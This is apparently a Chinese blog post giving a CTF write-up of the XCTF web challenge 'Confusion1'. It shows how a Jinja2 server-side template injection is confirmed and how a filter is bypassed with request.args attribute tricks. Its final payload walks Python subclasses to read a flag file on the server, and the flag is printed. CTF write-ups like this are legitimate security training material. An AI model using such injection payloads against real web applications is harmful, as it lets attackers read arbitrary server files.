当前位置: 首页 > news >正文

120,【4】 攻防世界 web Confusion1(jinja2)

news 2025/3/12 19:15:19

进入靶场

题目描述:

某天,Bob说:PHP是最好的语言,但是Alice不赞同。所以Alice编写了这个网站证明。在她还没有写完的时候,我发现其存在问题。(请不要使用扫描器)

属于模板注入的题,新领域啊

点上面的登录注册看看

都显示not found

我一般看到这个页面,直接放弃这两个选项,不过这个题长知识了,还能从这个页面找到信息,也能从源代码中找到信息

1,发现这里的login.php进行了一个原样回显,猜测存在模板注入

2,源代码中看到/知道这是flag的路径

先验证模板注入

{ {6*6}}

 

 确实存在

昨天最后一道题就是这个类型,直接试试昨天的

{ {url_for.__globals__['current_app'].config['FLAG']}}

方法错了

换一个

 { {''[request.args.a]}}?a=__class__

成功

{ {''[request.args.a][request.args.b][2][request.args.c]()[40]('/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt')[request.args.d]()}}?a=__class__&b=__mro__&c=__subclasses__&d=read

cyberpeace{79a18c03506368e5a981f655184ffc57}

  

 


http://www.mrgr.cn/news/89902.html

相关文章:

  • 介绍10个比较优秀好用的Qt相关的开源库
  • 音频进阶学习十二——Z变换一(Z变换、收敛域、性质与定理)
  • [论文阅读] Knowledge Fusion of Large Language Models
  • 图解BWT(Burrows-Wheeler Transform) 算法
  • DeepSeek与人工智能的结合:探索搜索技术的未来
  • Linux之安装docker
  • 学习数据结构(6)单链表OJ
  • 机器学习中常用的评价指标
  • Vue(4)
  • springboot配置https
  • 开放式TCP/IP通信
  • webpack系统学习
  • 【Linux网络编程】之守护进程
  • ASP.NET Core对JWT的封装
  • 基于 SpringBoot3 的 SpringSecurity6 + OAuth2 自定义框架模板
  • MYSQL索引与视图
  • vue2+vue3 HMCXY基础入门
  • 零基础学习书生.浦语大模型--基础岛
  • TCN时间卷积神经网络多变量多步光伏功率预测(Matlab)
  • Ubuntu20.04 本地部署 DeepSeek-R1 及 chatbox可视化